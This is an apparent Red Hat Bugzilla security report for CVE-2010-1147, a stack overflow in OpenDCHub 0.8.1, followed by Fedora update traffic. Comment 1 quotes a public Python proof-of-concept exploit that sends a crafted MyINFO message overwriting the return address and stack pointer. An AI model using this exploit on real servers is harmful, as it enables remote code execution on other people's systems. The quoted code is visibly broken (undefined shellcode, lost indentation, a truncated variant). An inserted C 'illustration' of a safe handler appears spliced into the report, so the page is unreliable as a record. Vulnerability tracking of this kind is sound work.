Bug 579206 (CVE-2010-1147) - CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Status: NEW
Alias: CVE-2010-1147
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: http://www.indahax.com/exploits/opend...
Whiteboard: impact=moderate,source=debian,reporte...
Keywords: Security
Depends On: 579207
Reported: 2010-04-03 09:11 UTC by Jan Lieskovsky
Modified: 2019-06-08 12:58 UTC (History)

Clone Of:
Last Closed:


Description Jan Lieskovsky 2010-04-03 09:11:37 UTC
Pierre Nogues found a stack overflow flaw in the way Open DC Hub
sanitized the content of a user's MyINFO message. A remote attacker
with a valid Open DC Hub account could send a specially-crafted
MyINFO message to another user / all users connected to a particular
Direct Connect network, leading to a denial of service (opendchub
crash) or, potentially, to arbitrary code execution with the privileges
of the user running opendchub.

  [1] http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600
  [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308

CVE Request:
  [3] http://www.openwall.com/lists/oss-security/2010/04/03/1
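As an added illustration of the defensive pattern this report calls for (not OpenDCHub's own code, nor the 0.8.2 fix): a bounds-checked MyINFO handler in C that keeps every length unsigned, so a computed length cannot go negative the way the PoC relies on, and checks the size against a fixed stack record before copying. MYINFO_MAX, handle_myinfo, check_myinfo and check_filler are assumed names, and the sample messages are constructed.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical fixed-size per-user record, such as a hub might keep on the stack. */
#define MYINFO_MAX 255
/* Outcome codes for the handler below (names constructed for this example). */
enum myinfo_rc { MYINFO_OK = 0, MYINFO_BAD_PREFIX, MYINFO_NO_TERMINATOR, MYINFO_TOO_LONG };

/* Copy the payload of "$MyINFO $ALL <nick> <info>|" into a fixed buffer. Lengths are
 * size_t, so nothing can be driven negative like a signed int length, and the size
 * is checked before a single byte is written. */
enum myinfo_rc handle_myinfo(const char *msg, size_t msg_len, char *out, size_t out_size)
{
    static const char prefix[] = "$MyINFO $ALL ";
    const size_t plen = sizeof prefix - 1;
    const char *end; size_t body_len;
    if (msg_len < plen || memcmp(msg, prefix, plen) != 0)
        return MYINFO_BAD_PREFIX;
    /* DC commands end with '|'; an unterminated command is rejected, not scanned past. */
    end = memchr(msg + plen, '|', msg_len - plen);
    if (end == NULL)
        return MYINFO_NO_TERMINATOR;
    body_len = (size_t)(end - (msg + plen));
    if (body_len >= out_size)          /* keep one byte for the NUL terminator */
        return MYINFO_TOO_LONG;
    memcpy(out, msg + plen, body_len);
    out[body_len] = '\0';
    return MYINFO_OK;
}

/* Run the handler against a MYINFO_MAX-byte stack record, as a hub would. */
enum myinfo_rc check_myinfo(const char *msg)
{
    char record[MYINFO_MAX];
    return handle_myinfo(msg, strlen(msg), record, sizeof record);
}

/* Build "$MyINFO $ALL joseph " + n bytes of 'A' + "|" (constructed input) and check it. */
enum myinfo_rc check_filler(size_t n)
{
    static const char head[] = "$MyINFO $ALL joseph ";
    const size_t hlen = sizeof head - 1;
    char buf[1024];
    if (hlen + n + 2 > sizeof buf)
        return MYINFO_TOO_LONG;        /* exceeds our scratch space: same verdict */
    memcpy(buf, head, hlen);
    memset(buf + hlen, 'A', n);
    buf[hlen + n] = '|'; buf[hlen + n + 1] = '\0';
    return check_myinfo(buf);
}
```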

Comment 1 Jan Lieskovsky 2010-04-03 09:13:08 UTC
Public PoCs by Pierre posted in [1]:

# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
# Description:
#     OpenDcHub is a direct connect hub for Linux
#     OpenDcHub doesn't handle a specially crafted MyINFO message, which leads to a stack overflow.
# Affected versions :
#     OpenDcHub 0.8.1
# Platforms :
#     Unix
# Usage :
#     ./exploit.py
import socket
host = ''
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")
hax="$MyINFO $ALL joseph "
for i in range(103 - len(shellcode)):
hax+="\x20\x81\x81\x80" # esp
hax+="\xed\xf6\xfe\xbf" # eip
# V2
# more complex version, working too; it has more space for the shellcode
hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value
hax+="\x20\x81\x81\x80" # esp
hax+="\x80\xf7\xfe\xbf" # eip
hax+="\xCC\xCC\xCC\xCC" # useless var
hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time

Comment 2 Jan Lieskovsky 2010-04-03 09:14:30 UTC
This issue affects the versions of the opendchub package,
as shipped with Fedora releases of 11 and 12.

Please fix.

Comment 4 Jan Lieskovsky 2010-04-06 07:40:05 UTC
This is CVE-2010-1147.

Comment 5 Roshan Singh 2010-04-08 17:56:51 UTC
I have fixed the bug and created the RPM, but I forgot to put the CVE IDs in the RPM changelog. Do I need to recreate the RPM?

Comment 6 Jan Lieskovsky 2010-04-08 18:13:58 UTC
Hi Roshan,

  I can see "- New release with fix for buffer overflow" in
the Changelog, which should be sufficient. (Some further
guidance is also available here:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0)

But please, when submitting the request to Bodhi, be sure to
mention the "CVE-2010-1147" identifier in the "Update Information"
field, together with #579206 (this bug) within the "Bugs Fixed" field.

Thanks && Regards, Jan.
Jan iankko Lieskovsky / Red Hat Security Response Team

Comment 7 Fedora Update System 2010-04-08 18:29:28 UTC
opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11.

Comment 8 Fedora Update System 2010-04-08 18:30:31 UTC
opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12.

Comment 9 Fedora Update System 2010-04-08 18:31:49 UTC
opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13.

Comment 10 Roshan Singh 2010-04-09 04:26:58 UTC
I have deleted these updates; I had uploaded the wrong tarball to SourceForge. Luckily nobody had downloaded it until then. I will update the RPM by today.

I am sorry for the inconvenience.

Comment 11 Fedora Update System 2010-04-10 17:25:09 UTC
opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12.

Comment 12 Fedora Update System 2010-04-10 17:25:13 UTC
opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11.

Comment 13 Fedora Update System 2010-04-10 17:25:17 UTC
opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13.

Comment 14 Fedora Update System 2010-04-30 17:10:57 UTC
opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 15 Fedora Update System 2010-04-30 17:18:50 UTC
opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.
